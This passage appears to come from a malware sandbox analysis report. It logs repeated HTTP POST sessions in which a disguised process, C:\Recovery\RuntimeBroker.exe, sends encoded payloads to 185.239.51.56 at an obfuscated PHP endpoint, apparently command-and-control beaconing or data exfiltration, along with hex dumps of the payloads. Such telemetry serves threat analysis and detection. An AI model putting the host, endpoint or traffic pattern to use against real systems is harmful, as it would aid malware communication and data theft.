                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  66192.168.2.449853185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:01.415987968 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:01.769074917 CET2504OUTData Raw: 56 59 5b 50 5a 58 5e 50 5f 5a 5a 53 57 51 56 54 5f 55 5d 45 51 53 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY[PZX^P_ZZSWQVT_U]EQSW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B<?2""/'3+,%+B9+85Z"&!#+#Q3%-9="^%#[.
                                                                                                  Jan 1, 2025 02:28:02.150590897 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:02.292403936 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:02 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  67192.168.2.449860185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:02.415165901 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:02.769310951 CET2504OUTData Raw: 56 5c 5e 51 5f 5d 5b 52 5f 5a 5a 53 57 51 56 54 5f 54 5d 41 51 53 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^Q_][R_ZZSWQVT_T]AQSWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][')<*X6'13/>)?B&^(^&!6!"8?Q'] ]24::"^%#[.
                                                                                                  Jan 1, 2025 02:28:03.136748075 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:03.149343014 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:03 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  68192.168.2.449867185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:03.351349115 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:03.706432104 CET2504OUTData Raw: 56 58 5b 57 5a 5c 5e 54 5f 5a 5a 53 57 5e 56 53 5f 54 5d 40 51 56 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VX[WZ\^T_ZZSW^VS_T]@QVW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)<""$2#([8=<'2\?5_#%>[7+<%+<&>\9"^%#[.
                                                                                                  Jan 1, 2025 02:28:04.098622084 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:04.255013943 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:03 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  69192.168.2.449876185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:04.381692886 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:04.737799883 CET2504OUTData Raw: 56 5f 5b 52 5a 58 5b 5d 5f 5a 5a 53 57 58 56 50 5f 5c 5d 49 51 50 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_[RZX[]_ZZSWXVP_\]IQPW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['D?>!?' ;/>*=7%((:"%2Z7;<';(\&72^:"^%#[."
                                                                                                  Jan 1, 2025 02:28:05.093189001 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:05.104100943 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:04 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  70192.168.2.449882185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:05.224291086 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:05.581475019 CET2504OUTData Raw: 53 5e 5e 50 5a 5f 5b 5d 5f 5a 5a 53 57 50 56 53 5f 5d 5d 48 51 5d 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^PZ_[]_ZZSWPVS_]]HQ]WX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<,1" ' '/5+=+^)^65>[ ;#T$+(]&Q%.-"^%#[.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  71192.168.2.449888185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:05.915301085 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:06.269009113 CET1600OUTData Raw: 53 5d 5e 56 5f 5a 5b 55 5f 5a 5a 53 57 51 56 53 5f 5e 5d 44 51 57 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^V_Z[U_ZZSWQVS_^]DQWWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A+Z"60&X,=+=(862^48V3;]2%.="^%#[.
                                                                                                  Jan 1, 2025 02:28:06.617422104 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:06.626594067 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:06 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  72192.168.2.449889185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:06.035043001 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:06.393908024 CET2504OUTData Raw: 56 5b 5e 57 5a 58 5e 51 5f 5a 5a 53 57 5c 56 5f 5f 55 5d 43 51 57 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[^WZX^Q_ZZSW\V__U]CQWWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?"_#"23;&Z<.Y<>5= ^(3%9"^%#[.2
                                                                                                  Jan 1, 2025 02:28:06.747714996 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:06.759414911 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:06 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  73192.168.2.449895185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:06.886421919 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:07.237708092 CET2504OUTData Raw: 53 59 5e 52 5a 5b 5e 53 5f 5a 5a 53 57 5b 56 5e 5f 5f 5d 42 51 50 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^RZ[^S_ZZSW[V^__]BQPW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?5#",[23?,6Z(2X((2!6.[#^ $32799-"^%#[..
                                                                                                  Jan 1, 2025 02:28:07.596858025 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:07.737559080 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:07 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  74192.168.2.449903185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:07.863894939 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:08.222075939 CET2500OUTData Raw: 56 5a 5e 5f 5f 58 5b 5d 5f 5a 5a 53 57 59 56 50 5f 55 5d 46 51 55 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^__X[]_ZZSWYVP_U]FQUW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['?Z26,'0;,[1<+82"5)47']'2,="^%#[.>
                                                                                                  Jan 1, 2025 02:28:08.574812889 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:08.586486101 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:08 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  75192.168.2.449909185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:08.709635973 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:09.065808058 CET2500OUTData Raw: 56 5d 5e 57 5a 5a 5b 51 5f 5a 5a 53 57 59 56 53 5f 5f 5d 43 51 55 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^WZZ[Q_ZZSWYVS__]CQUW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E(/*[!$%(],5+$+8"%*#%8'1$.9"^%#[.2
                                                                                                  Jan 1, 2025 02:28:09.439157963 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:09.446872950 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:09 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  76192.168.2.449917185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:09.566495895 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:09.925236940 CET2504OUTData Raw: 53 5e 5b 50 5a 58 5b 5d 5f 5a 5a 53 57 51 56 57 5f 59 5d 47 51 53 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[PZX[]_ZZSWQVW_Y]GQSWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)<"2?17;[6<*(=Y!6Y4/W0+$7)9-"^%#[.
                                                                                                  Jan 1, 2025 02:28:10.290724039 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:10.431458950 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:10 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  77192.168.2.449924185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:10.551018000 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:10.909564972 CET2504OUTData Raw: 53 59 5b 53 5a 5b 5e 57 5f 5a 5a 53 57 5a 56 5f 5f 55 5d 40 51 56 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY[SZ[^W_ZZSWZV__U]@QVW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@(/2"''#7,=?2^<1^5=7 $++1-:"^%#[.*
                                                                                                  Jan 1, 2025 02:28:11.260884047 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:11.399409056 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:11 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  78192.168.2.449931185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:11.517672062 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  79192.168.2.449932185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:11.633991957 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1572
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:11.987782955 CET1572OUTData Raw: 56 5f 5e 57 5a 5b 5b 55 5f 5a 5a 53 57 59 56 56 5f 5d 5d 46 51 55 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^WZ[[U_ZZSWYVV_]]FQUW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)<_"1$2#[8>9('9<)Z!!7,'8724"."^%#[."
                                                                                                  Jan 1, 2025 02:28:12.376564026 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:12.384185076 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:12 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  80192.168.2.449934185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:11.753803015 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:12.112699986 CET2504OUTData Raw: 56 58 5b 52 5f 5a 5e 53 5f 5a 5a 53 57 5b 56 53 5f 59 5d 47 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VX[R_Z^S_ZZSW[VS_Y]GQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(,Z5T#%;[9<7>^<"%4;($ Z%"-"^%#[..
                                                                                                  Jan 1, 2025 02:28:12.501991034 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:12.510299921 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:12 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  81192.168.2.449942185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:12.628787041 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
